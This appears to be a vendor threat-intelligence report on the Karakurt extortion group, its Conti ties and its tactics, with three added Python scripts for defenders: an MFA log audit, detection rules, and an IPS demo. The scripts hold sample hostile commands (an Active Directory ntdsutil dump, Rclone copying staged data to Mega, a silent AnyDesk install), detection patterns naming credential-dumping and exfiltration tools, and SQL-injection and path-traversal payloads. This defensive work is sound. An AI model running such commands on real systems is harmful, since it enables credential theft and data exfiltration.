This month, the Cybersecurity and Infrastructure Security Agency (CISA) issued a warning about a data extortion group called Karakurt. The threat actor is also known as Karakurt Team and Karakurt Lair, and although most media outlets are reporting the group as “new”, Karakurt has actually been active since 2021.
Karakurt uses a variety of tactics, techniques, and procedures that make it difficult to defend against and mitigate. The group also skips the encryption of compromised machines and files and goes straight to data exfiltration, holding the stolen data until the ransom is paid. So far, the group has had victims in North America and Europe, and it has published several press releases or announcements shaming victims who haven’t cooperated. Let’s take a detailed look at Karakurt and why securing backups may not be enough to stop data extortion groups.
As we stated previously, even though Karakurt has been called a new data extortion group, it has been active since June 2021. In September 2021, Accenture Security observed Karakurt intrusion clusters, including multiple sightings within a short timeframe. At that time, Karakurt had impacted over 40 victims and was specifically targeting small companies or corporate subsidiaries rather than large corporations.
Additionally, Karakurt focuses on organizations that have already been compromised, obtaining access via a third-party intrusion broker or through stolen login credentials. After they obtain the data, they threaten to release it on their leak site, which is only accessible through the dark web. If victims don’t comply, they shame them publicly on the site by releasing the sensitive data.
In December 2021, Karakurt claimed to hold data from 40 victims compromised between September and November 2021. The names of the victims are not public. Karakurt promises to delete stolen data after payment is made, but some victims reported that the threat actors didn’t keep their promise.
Karakurt (Turkish for “black wolf”) is believed to be an arm of, or allied with, the ransomware group Conti. If you recall, Avertium’s Cyber Threat Intelligence team mentioned Karakurt in a Threat Intelligence Report featuring Black Basta ransomware.
According to our partners at AdvIntel, Conti is rebranding as multiple ransomware groups: it is the brand, not the organization, that is shutting down. On May 19, 2022, Conti’s official website went offline, as did its negotiation site. Conti’s infrastructure (chat rooms, servers, proxy hosts, etc.) went through a massive reset.
The publicity function of Conti’s blog is still active, but the operational function of “Conti News” (used to upload new data to force victims to pay) is defunct, including the infrastructure for data uploads, negotiations, and the hosting of stolen data. AdvIntel believes that Conti can no longer sustain its extortion operations and that the shutdown was not spontaneous but calculated. May 19, 2022 is Conti’s official date of death, with the attack on Costa Rica being its final dance.
The attack on Costa Rica, which forced the country to declare a state of emergency, was Conti’s way of keeping the illusion that they were still active and diverting everyone’s attention, while working on their restructuring. During the diversion tactics, Conti’s extension groups such as Karakurt were actively and silently attacking organizations.
Researchers observed overlap between some of Karakurt’s attacks and Conti’s. The two groups use some of the same exfiltration tools and leave behind a file listing of the exfiltrated data (file-tree.txt) in the victim’s environment. When remotely accessing victims’ networks, both groups have used the same attacker hostname.
Image 1: Conti Compared to Karakurt
In addition to using some of the same tools, Karakurt was observed sending large sums of cryptocurrency to Conti wallets. Chainalysis, a blockchain analysis firm, observed Karakurt moving 11.6 Bitcoin (about $472,000) into a Conti wallet. They also observed several Karakurt victim payment addresses hosted by wallets that also house Conti victim payment addresses.
Karakurt’s initial access method is primarily through internet-facing systems, in particular virtual private network (VPN) appliances, using legitimate credentials. There isn’t enough forensic evidence to determine how the credentials are obtained, but one possibility is the exploitation of vulnerable VPN devices. In all observed cases, multi-factor authentication (MFA) for user accounts was either inconsistently applied or absent.
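The practical check that follows from this is to find out which accounts are reaching your VPN without MFA before an attacker does. The script below is an added example, not code from the report, CISA or Accenture: it parses a constructed key=value style VPN authentication log (the field names user, src, result and mfa are assumptions; real appliances log differently) and sorts accounts into those with MFA absent, inconsistent, or consistently present.

```python
"""Audit VPN authentication logs for logins that succeeded without MFA.

Added example, not from the report or from CISA/Accenture. The log format
below is a constructed key=value syslog style; real appliances differ, so
the field names (user, src, result, mfa) are assumptions.
"""
import re
from collections import defaultdict

# Constructed sample lines: one service account never uses MFA, one user
# is enrolled but has a non-MFA login, one user is always protected.
SAMPLE_LOG = """\
2022-06-03T02:14:07Z vpn01 auth user=jdoe src=203.0.113.8 result=success mfa=push
2022-06-03T02:16:41Z vpn01 auth user=svc_backup src=198.51.100.77 result=success mfa=none
2022-06-03T02:17:02Z vpn01 auth user=svc_backup src=198.51.100.77 result=success mfa=none
2022-06-03T03:05:55Z vpn01 auth user=mlee src=203.0.113.20 result=failure mfa=none
2022-06-03T03:30:12Z vpn01 auth user=mlee src=203.0.113.20 result=success mfa=totp
2022-06-03T22:40:19Z vpn01 auth user=jdoe src=192.0.2.45 result=success mfa=none
2022-06-04T01:02:33Z vpn01 auth user=svc_backup src=198.51.100.77 result=success mfa=none
""".splitlines()

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<device>\S+) auth (?P<kv>.+)$")


def parse_line(line):
    """Return a dict for an auth line, or None for lines we don't understand."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = {"ts": m["ts"], "device": m["device"]}
    for token in m["kv"].split():
        key, _, value = token.partition("=")
        rec[key] = value
    return rec


def audit(lines):
    """Classify every account seen logging in successfully.

    absent:       the account never completed MFA on any successful login
    inconsistent: some successful logins used MFA, some did not
    covered:      every successful login used MFA
    unprotected:  the individual successful logins that had no MFA
    """
    factors = defaultdict(list)
    unprotected = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec.get("result") != "success":
            continue
        mfa = rec.get("mfa", "none")
        factors[rec["user"]].append(mfa)
        if mfa == "none":
            unprotected.append(rec)

    report = {"absent": [], "inconsistent": [], "covered": [], "unprotected": unprotected}
    for user, seen in sorted(factors.items()):
        with_mfa = sum(1 for f in seen if f != "none")
        if with_mfa == 0:
            report["absent"].append(user)
        elif with_mfa < len(seen):
            report["inconsistent"].append(user)
        else:
            report["covered"].append(user)
    return report


if __name__ == "__main__":
    result = audit(SAMPLE_LOG)
    for bucket in ("absent", "inconsistent", "covered"):
        print(f"{bucket:13s} {', '.join(result[bucket]) or '-'}")
    for rec in result["unprotected"]:
        print(f"no-MFA login: {rec['ts']} {rec['user']} from {rec['src']}")
```

The "inconsistent" bucket is the one worth reading closely: an account that is enrolled in MFA but still has non-MFA successes usually means a bypass group, a legacy client, or a second login path, which is exactly the gap a stolen credential walks through.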
According to Accenture Security, Karakurt uses stolen credentials, service creation, remote management software, and Cobalt Strike command-and-control (C2) beacons to expand its foothold and maintain persistence. In more recent intrusions, the threat actors didn’t deploy backup persistence with Cobalt Strike; instead they used the VPN IP pool or AnyDesk to retain external remote access to compromised devices.
To move laterally, Karakurt leverages previously obtained user, service, and administrator credentials. In at least one intrusion set the group used Mimikatz, and it has used PowerShell to dump ntds.dit (the Active Directory database) and exfiltrate it. Karakurt uses these techniques and tools to escalate privileges on an as-needed basis.
Karakurt evades defenses by using tools and techniques that are already present in the environment (living off the land), along with remote management software. Accenture Security noted that Karakurt avoids common post-exploitation tools and commodity malware in favor of credential access. This approach lets the threat actor evade detection and bypass security tools such as EDR solutions, since there is little malware for them to flag.
If these tools aren’t already on the victim’s network, the group downloads common remote management and file transfer utilities to support later exfiltration (AnyDesk, 7-Zip, etc.). WinZip and 7-Zip are used for compression, while Rclone or FileZilla (SFTP) is used for staging and final exfiltration to Mega.io cloud storage.
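Because each of these tools is legitimate on its own, the detection opportunity is the sequence: an AD database dump, archiving to a staging directory, and a transfer utility pointed at Mega, all on the same host. The script below is an added example written for this report, not code from Avertium, Accenture or CISA. It runs rule matching over a constructed set of Sysmon-style process-creation events (the field names host, user, parent, image and cmdline are assumptions) and then correlates per host so that a lone 7-Zip extraction on a workstation does not fire.

```python
"""Flag the staging-and-exfiltration toolchain described above in
process-creation telemetry.

Added example, not code from the report, Accenture or CISA. The events are
constructed, loosely modelled on Sysmon Event ID 1 fields (host, user,
parent, image, cmdline); the field names are assumptions.
"""
import re
from collections import defaultdict

# Constructed events. FS01 shows the full chain (AD database dump, 7-Zip
# staging, Rclone to a Mega remote, AnyDesk install); WS07 is a benign
# 7-Zip extraction that must not fire.
SAMPLE_EVENTS = [
    {"host": "FS01", "user": r"CORP\svc_backup", "parent": "cmd.exe",
     "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": r'ntdsutil "ac i ntds" "ifm" "create full C:\temp\ad" q q'},
    {"host": "FS01", "user": r"CORP\svc_backup", "parent": "powershell.exe",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r'7z a -p -mhe=on C:\temp\stage\finance.7z "D:\Shares\Finance"'},
    {"host": "FS01", "user": r"CORP\svc_backup", "parent": "cmd.exe",
     "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone copy C:\temp\stage mega:backup --transfers 8"},
    {"host": "WS07", "user": r"CORP\jdoe", "parent": "explorer.exe",
     "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z x C:\Users\jdoe\Downloads\sdk.7z"},
    {"host": "FS01", "user": r"CORP\svc_backup", "parent": "cmd.exe",
     "image": r"C:\Users\Public\AnyDesk.exe",
     "cmdline": r"AnyDesk.exe --install C:\ProgramData\AnyDesk --silent"},
]

# One pattern per stage of the toolchain; matched case-insensitively
# against image path + command line. Tune to your estate: 7-Zip and
# AnyDesk are legitimate tools, so the value is in the correlation below.
RULES = [
    ("ntds_dump",       r"ntds\.dit|ntdsutil.*\bifm\b"),
    ("cred_dump",       r"mimikatz|sekurlsa|lsadump"),
    ("archive_staging", r"\b7z(\.exe)?\s+a\b|winzip|wzzip"),
    ("exfil_tool",      r"\brclone(\.exe)?\b|filezilla|\bsftp\b|mega(\.nz|\.io|:)"),
    ("remote_access",   r"anydesk"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]


def match_rules(event):
    """Names of the rules an event triggers, in RULES order."""
    text = f"{event.get('image', '')} {event.get('cmdline', '')}"
    return [name for name, rx in COMPILED if rx.search(text)]


def analyze(events):
    """Per-host rule hits plus the hosts where staging and exfil both occur."""
    hits = defaultdict(set)
    for ev in events:
        for name in match_rules(ev):
            hits[ev["host"]].add(name)
    chains = sorted(h for h, names in hits.items()
                    if {"archive_staging", "exfil_tool"} <= names)
    return {"hits": {h: sorted(n) for h, n in sorted(hits.items())},
            "exfil_chains": chains}


if __name__ == "__main__":
    report = analyze(SAMPLE_EVENTS)
    for host, names in report["hits"].items():
        print(f"{host}: {', '.join(names)}")
    print("staging+exfil chain on:", ", ".join(report["exfil_chains"]) or "none")
```

In production you would feed the same logic from your SIEM over a time window rather than a list, but the shape stays the same: cheap per-event indicators, then a per-host join that turns "someone ran 7-Zip" into "a file server dumped AD, archived a share and pushed it to Mega".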
When it comes to data extortion, backups are still important, but they won’t be enough to keep your organization from losing valuable data to Karakurt. As we stated before, Karakurt bypasses file encryption and focuses on data exfiltration instead. This means that your security focus should be on keeping threat actors out of your systems and networks.
Of course, backups are necessary and there will never be a time when they are not needed, but when a data extortion group like Karakurt blackmails your organization by threatening to leak sensitive data, backups mean little to nothing. Focusing on keeping intruders out of your environment in the first place will give you more leverage over data extortion groups. Implementing an intrusion prevention system (IPS) is a cyber security best practice that will help keep your organization safe.
An IPS protects a network by detecting threats in line and stopping them. It continuously monitors network traffic for signs of intrusion and for potentially malicious events. When an incident is found, the IPS reports it to system administrators and takes action to prevent the attack from succeeding. How does it do that? An IPS responds in one of several ways: altering the security environment (for example, blocking the offending source), stopping the attack itself by dropping the traffic, or altering the content of the attack.
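To make those three response strategies concrete, here is a small inline inspection engine written as an added illustration for this report; it is not code from Avertium or from any IPS product. The signatures, the traffic and the block threshold are constructed assumptions, but the decision flow (match a signature, then drop, rewrite or alert, and blocklist a source that keeps tripping rules) is how inline IPS products behave.

```python
"""Minimal inline IPS decision engine showing the three response strategies
named above: alter the environment (dynamically block a source), stop the
attack (drop the packet), or alter the attack content (rewrite the payload).

Added illustration, not code from the report or from any IPS product. The
packets, signatures and block threshold are constructed assumptions.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass
class Packet:
    src: str
    dst_port: int
    payload: bytes


@dataclass
class Signature:
    name: str
    pattern: re.Pattern     # matched against the payload
    action: str             # "alert" (log and pass), "drop", or "rewrite"
    replacement: bytes = b""  # only used by "rewrite"


# Constructed signatures, in the spirit of Snort/Suricata content rules.
SIGNATURES = [
    Signature("sqli-union-select", re.compile(rb"union\s+select", re.I), "drop"),
    Signature("path-traversal", re.compile(rb"\.\./"), "rewrite", b"./"),
    Signature("scanner-user-agent", re.compile(rb"User-Agent: (sqlmap|nikto)", re.I), "alert"),
]


class InlineIPS:
    """Inspects every packet; after `block_after` hits from one source, the
    source is added to a dynamic blocklist (the 'alter the environment' response)."""

    def __init__(self, signatures, block_after=3):
        self.signatures = signatures
        self.block_after = block_after
        self.strikes = Counter()
        self.blocked = set()
        self.events = []  # (src, signature name, action) for the SOC

    def inspect(self, pkt):
        """Return (verdict, packet to forward or None)."""
        if pkt.src in self.blocked:
            return "blocked-src", None
        for sig in self.signatures:
            if not sig.pattern.search(pkt.payload):
                continue
            self.events.append((pkt.src, sig.name, sig.action))
            self.strikes[pkt.src] += 1
            if self.strikes[pkt.src] >= self.block_after:
                self.blocked.add(pkt.src)
            if sig.action == "drop":
                return "drop", None
            if sig.action == "rewrite":
                clean = sig.pattern.sub(sig.replacement, pkt.payload)
                return "rewrite", Packet(pkt.src, pkt.dst_port, clean)
            return "alert", pkt  # alert: log it, let it through
        return "pass", pkt


# Constructed traffic: one benign client and one attacker that trips three
# signatures in a row and is then blocked outright.
TRAFFIC = [
    Packet("198.51.100.9", 443, b"GET /index.html HTTP/1.1\r\nHost: shop\r\n\r\n"),
    Packet("203.0.113.5", 443, b"GET /item?id=1 UNION SELECT user,pass FROM users HTTP/1.1\r\n\r\n"),
    Packet("203.0.113.5", 443, b"GET /../../etc/passwd HTTP/1.1\r\n\r\n"),
    Packet("203.0.113.5", 443, b"GET / HTTP/1.1\r\nUser-Agent: sqlmap/1.6\r\n\r\n"),
    Packet("203.0.113.5", 443, b"GET /index.html HTTP/1.1\r\n\r\n"),
    Packet("198.51.100.9", 443, b"GET /about HTTP/1.1\r\n\r\n"),
]


def run(traffic, ips=None):
    """Feed packets through the IPS; return the verdict for each one."""
    ips = ips or InlineIPS(SIGNATURES)
    return [ips.inspect(p)[0] for p in traffic]


if __name__ == "__main__":
    for p, verdict in zip(TRAFFIC, run(TRAFFIC)):
        print(f"{p.src:14s} {verdict:12s} {p.payload[:40]!r}")
```

The caveat that matters for Karakurt specifically: every signature above fires on attack content. A login over the VPN with a valid username and password, followed by Rclone pushing an archive to a cloud storage service, carries no such content, so an IPS is one layer and not the whole answer; MFA on the VPN and egress controls on where data is allowed to go are the controls that address this group's actual entry and exit.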
By scanning network traffic, the IPS guards against risks such as:
The IPS also inspects every packet that passes through the network in real time. If a potential threat is observed, the IPS does one of the following:
If your organization implements an IPS, there are several benefits, including:
Karakurt is the second data extortion group Avertium has covered in a short span of time. The first to make headlines was Lapsus$. Avertium became aware of Lapsus$ after it breached the authentication company Okta Inc. Okta was not the only organization to fall victim to Lapsus$: in March 2022, Lapsus$ breached Globant, and in April 2022 it breached T-Mobile, stealing the company’s source code. Lapsus$ also breached Microsoft, Samsung, Ubisoft, and Nvidia.
Like Karakurt, Lapsus$ focuses heavily on data extortion, gaining initial access by compromising personal or private accounts, then using that access to hunt for additional credentials that ultimately lead into corporate systems. Once inside the target network, Lapsus$ exploits unpatched vulnerabilities on internally accessible servers and finds exposed credentials by searching code repositories and collaboration platforms.
Once Lapsus$ has the information it wants, it threatens to leak it unless a ransom is paid. Lapsus$ is estimated to have made $14 million in Bitcoin. As you can see, data extortion is not a new idea, but it may become a new trend among threat actors. Skipping file encryption and holding stolen data for ransom can be more effective for extortion: threat actors know that most organizations would be willing to pay to avoid sensitive data being leaked, and backups do nothing to reduce that risk.
Even with anti-malware solutions installed, Karakurt is a serious risk to organizations. Because the group relies on legitimate credentials and tooling rather than malware, its activity can go undetected by EDR, leaving organizations everywhere vulnerable to attack. However, Avertium has advanced services that can help keep your organization safe:
This document and its contents do not constitute, and are not a substitute for, legal advice. The outcome of a Security Risk Assessment should be used to ensure that diligent measures are taken to lower the risk of potential weaknesses being exploited to compromise data.
Although the Services and this report may provide data that Client can use in its compliance efforts, Client (not Avertium) is ultimately responsible for assessing and meeting Client's own compliance responsibilities. This report does not constitute a guarantee or assurance of Client's compliance with any law, regulation or standard.
COPYRIGHT: Copyright © Avertium, LLC and/or Avertium Tennessee, Inc. | All rights reserved.